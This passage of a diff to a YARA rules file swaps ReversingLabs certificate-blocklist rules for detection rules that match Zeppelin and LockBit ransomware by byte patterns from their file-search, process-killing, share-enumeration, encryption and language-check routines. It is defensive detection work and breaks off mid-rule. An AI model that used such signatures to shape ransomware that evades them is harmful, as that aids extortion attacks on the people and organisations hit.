+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zeppelin.yara#L1-L109"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "39dbaa232ea9125934b3682d780e3821d12e771f2b844d027d99a432fe249d9f"
+		logic_hash = "8fb07e49d2ff9d497fb36a5d901748315ae519f5ef845d1a5ec6341d0eb1f68c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Zeppelin"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACHNA PLITKA, TOV" and pe.signatures [ i ] . serial == "69:22:bb:5d:e8:8e:41:27:e1:ac:69:69:e6:a1:99:f5" and 1552692162 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_73065Efa163B7901Fa1Ccb0A54E80540 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "949f55a9-7aa0-50de-bb81-fed5d27c3d24"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3270-L3286"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e420c37c04aa676c266a4c2c228063239815c173a83c39d426c5a674648f1934"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$search_files_p1 = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 45 ?? E8 ??
+            ?? ?? ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 2B D8 43 53 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 42
+            8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? FF 30 FF 75 ?? 68 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 83 F8
+            ?? 7C ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C3
+        }
+		$search_files_p2 = {
+            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50
+            8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ??
+            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C3
+        }
+		$kill_processes = {
+            55 8B EC 33 C9 51 51 51 51 51 51 51 51 53 56 57 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ??
+            88 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 55 68 ?? ?? ?? ??
+            64 FF 32 64 89 22 8D 55 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B D8 8B 45 ?? 89 58 ?? 8B C3 B2 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
+            C6 40 ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B F0 85 F6
+            7E ?? BB ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D
+            55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 58 E8 ?? ?? ?? ?? 75 ?? 8D 55 ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 40 ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ??
+            EB ?? 8D 45 ?? 8B 55 ?? 0F B6 54 1A ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 43 4E 75 ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B1 ?? 33
+            D2 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
+            8B 45 ?? 80 7D ?? ?? 74 ?? E8 ?? ?? ?? ?? 64 8F 05 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5F
+            5E 5B 8B E5 5D C3
+        }
+		$enum_shares = {
+            55 8B EC B9 ?? ?? ?? ?? 6A ?? 6A ?? 49 75 ?? 51 53 56 57 89 45 ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? 33
+            D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 45 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B
+            45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 55 ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 48 85
+            C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 55 ?? 8B 45 ?? 8B
+            18 FF 53 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 FF 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? 33 D2 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ??
+            8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89
+            10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? FF 45 ??
+            FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A
+            59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ??
+            ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB
+            ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 33 DB 89 5D ?? 84 D2 74 ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B D9 88
+            55 ?? 8B F0 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 D2 8B C6 E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 88 5E ?? 88 5E ?? 56 6A ?? 8D 46 ?? 50 B9 ?? ?? ?? ?? 33 D2 33 C0 E8 ??
+            ?? ?? ?? 8B D8 89 5E ?? 85 DB 75 ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 45 ??
+            89 45 ?? C6 45 ?? ?? 8D 45 ?? 50 6A ?? 8B 0D ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SOVA CONSULTANCY LTD" and pe.signatures [ i ] . serial == "73:06:5e:fa:16:3b:79:01:fa:1c:cb:0a:54:e8:05:40" and 1548115200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $kill_processes ) and ( $enum_shares ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4842Afad00904Ed8C98811E652Ccb3B7 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Lockbit : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LockBit ransomware."
 		author = "ReversingLabs"
-		id = "f09723aa-85a6-5d96-a71e-94f0e0a0f23c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9a6405dc-da1f-5426-a424-a73bceb1928c"
+		date = "2020-06-26"
+		modified = "2022-03-31"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3288-L3304"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.LockBit.yara#L1-L282"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2b5c7c13369c7b89f1ea5474de3644a12bf6412cb3fa8ade5b66de280fb10cbf"
+		logic_hash = "030222bd659c7e0e03858fa062067b1483aca3b7973cce19a1e7cdbb48d4405c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LockBit"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERY EXCLUSIVE LTD\"" and pe.signatures [ i ] . serial == "48:42:af:ad:00:90:4e:d8:c9:88:11:e6:52:cc:b3:b7" and 1545177600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5A59A686B4A904D0Fca07153Ea6Db6Cc : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "018e511f-191d-5fd4-8ab0-0e5bbff44d58"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3306-L3322"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7597b2ba870ec58ac0786a97fb92956406fe019c81f6176cc1a581988d3a9632"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$enum_resources_v1 = {
+            55 8B EC 83 EC ?? 57 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ??
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ??
+            ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 53 56 FF 75 ?? 6A ?? 57 E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            33 DB 39 5D ?? 76 ?? 8B F7 0F 1F 80 ?? ?? ?? ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8B CE E8
+            ?? ?? ?? ?? 83 7F ?? ?? 74 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 45
+            ?? FF 70 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 8B 45 ?? FF 70 ?? 57 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B
+            0D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? F0 FF 05 ?? ?? ?? ?? 8B 7D ?? 43 83 C6 ?? 3B 5D
+            ?? 72 ?? E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 5B 85 C0
+            75 ?? B8 ?? ?? ?? ?? 5F 8B E5 5D C3 33 C0 5F 8B E5 5D C3
+        }
+		$find_files_v1_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B C1 C7 45 ?? ?? ?? ?? ?? 57 50 89 45 ?? 33 C9 8D
+            45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 66 89 4D ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ??
+            ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 33 C0 8B 35 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D
+            45 ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D3 85 C0
+            0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 85
+            C0 0F 84
+        }
+		$find_files_v1_2 = {
+            45 ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 33 C9 66 39 8D ?? ?? ?? ?? 74 ?? 8D 40 ?? 41 66 83 38 ?? 75 ??
+            83 F9 ?? 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 56 68 ?? ??
+            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
+            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
+        }
+		$find_files_v1_3 = {
+            85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ??
+            ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ??
+            56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? FF D3 85 C0 0F 84
+            ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 33 C9 0F 11 45 ?? C7 45 ?? ?? ?? ?? ?? 66 C7 45 ??
+            ?? ?? 66 90 8A 45 ?? 30 44 0D ?? 41 83 F9 ?? 72 ?? 33 C0 C6 45 ?? ?? 66 89 45 ?? 8D
+            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3
+            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF D3 85 C0 0F 84 ?? ??
+            ?? ?? 8B 4D ?? 8D 95 ?? ?? ?? ?? 2B D1 0F B7 01 8D 49 ?? 66 89 44 11 ?? 66 85 C0 75
+            ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
+            66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 C7 ?? 0F 1F 40 ?? 66 8B 47 ?? 83 C7 ?? 66
+            85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 A8 ?? 75 ??
+            A8 ?? 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 8B 35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6
+            83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 5F
+            5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v1_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 53 56 57 8B F9 C7 45 ?? ?? ??
+            ?? ?? 89 7D ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
+            89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+        }
+		$encrypt_files_v1_2 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 33 DB 89 7D ?? 33 F6 0F 1F 00 8B 84
+            B5 ?? ?? ?? ?? 85 C0 74 ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 B8 ?? ?? ?? ?? 0F 44 D8 46
+            81 FE ?? ?? ?? ?? 7C ?? 8B 7D ?? 33 C0 66 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 57 50 8D 85 ?? ?? ?? ?? 89 5D ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D3 83 F8 ?? 75
+            ?? 8B CF E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B
+        }
+		$encrypt_files_v1_3 = {
+            CF E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 FE ?? 7D ?? 46 EB ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83
+            FB ?? 75 ?? 8B 1D ?? ?? ?? ?? EB ?? FF 35 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 53 FF
+            15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B
+            E5 5D C3 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 45 ?? 8B 75 ?? 89 43 ?? 8D 43 ?? 50 56 C7
+            43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ??
+            ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 8B 4B ?? 8B 43 ?? 85
+            C9 7F ?? 7C ?? 83 F8 ?? 72 ?? 83 E8 ?? C7 43 ?? ?? ?? ?? ?? 89 43 ?? 8B 43 ?? 83 D9
+            ?? 89 43 ?? 8B 43 ?? 89 43 ?? 8D 83 ?? ?? ?? ?? 6A ?? 50 89 4B ?? C7 43 ?? ?? ?? ??
+            ?? 89 73 ?? E8 ?? ?? ?? ?? 6A ?? 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 53 6A ?? 6A ??
+            8D 73 ?? 56 FF 73 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ??
+            ?? ?? ?? 74 ?? 56 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 FF D6 83 C4 ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 F0 FF 05 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ??
+            B8 ?? ?? ?? ?? F0 0F C1 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7E ?? 8B 35 ?? ?? ?? ?? 6A
+            ?? FF D6 83 3D ?? ?? ?? ?? ?? 7D ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$check_blacklisted_languages_v2 = {
+            FF D0 0F B7 C0 B9 2C 08 ?? ?? 66 3B C1 0F 84 ?? ?? ?? ?? B9 2C 04 ?? ?? 66 3B C1 74
+            ?? B9 2B 04 ?? ?? 66 3B C1 74 ?? B9 23 04 ?? ?? 66 3B C1 74 ?? B9 37 04 ?? ?? 66 3B
+            C1 74 ?? B9 3F 04 ?? ?? 66 3B C1 74 ?? B9 40 04 ?? ?? 66 3B C1 74 ?? B9 19 08 ?? ??
+            66 3B C1 74 ?? B9 19 04 ?? ?? 66 3B C1 74 ?? B9 28 04 ?? ?? 66 3B C1 74 ?? B9 42 04
+            ?? ?? 66 3B C1 74 ?? B9 43 08 ?? ?? 66 3B C1 74 ?? B9 43 04 ?? ?? 66 3B C1 74 ?? B9
+            22 04 ?? ?? 66 3B C1 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 85 ?? ?? ?? ?? 64
+            A1 ?? ?? ?? ?? 8B 40 ?? 8B 40 ?? 8B 00 8B C8 89 45 ?? 8B D0 89 4D ?? 0F B7 59 ?? 33
+            FF 8B 71 ?? D1 EB C7 45 ?? ?? ?? ?? ?? 8D 04 5E 3B F0 0F 47 DF 85 DB 74 ?? 8A 0E 8D
+            76 ?? 0F BE D1 80 E9 ?? 8B C2 83 C8 ?? 80 F9 ?? 0F 47 C2 47 33 45 ?? 69 C0 ?? ?? ??
+            ?? 89 45 ?? 3B FB 75 ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 01 8B
+            C8 89 4D ?? 3B C2 74 ?? 83 79 ?? ?? 75 ?? 33 DB 89 1D ?? ?? ?? ?? A1 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 43 ?? 8B 4C 18 ?? 8D 04 19 89 45 ??
+            3B C3 74 ?? 33 C9 89 4D ?? 39 48 ?? 74 ?? 8B 40 ?? 8B 55 ?? 03 C3 89 45 ?? 0F 1F 40
+            ?? 8B 30 BF ?? ?? ?? ?? 8A 04 1E 03 F3 46 84 C0 74 ?? 0F BE D0 8D 76 ?? 2C ?? 8B CA
+            83 C9 ?? 3C ?? 8A 46 ?? 0F 47 CA 33 CF 69 F9 ?? ?? ?? ?? 84 C0 75 ?? 8B 4D ?? 8B 55
+            ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 41 83 C0 ?? 89 4D ?? 89 45 ?? 3B 4A
+            ?? 75 ?? 33 C0 A3 ?? ?? ?? ?? 6A ?? FF D0 5F 5E 5B 8B E5 5D C3
+        }
+		$create_net_host_trav_threads_v2 = {
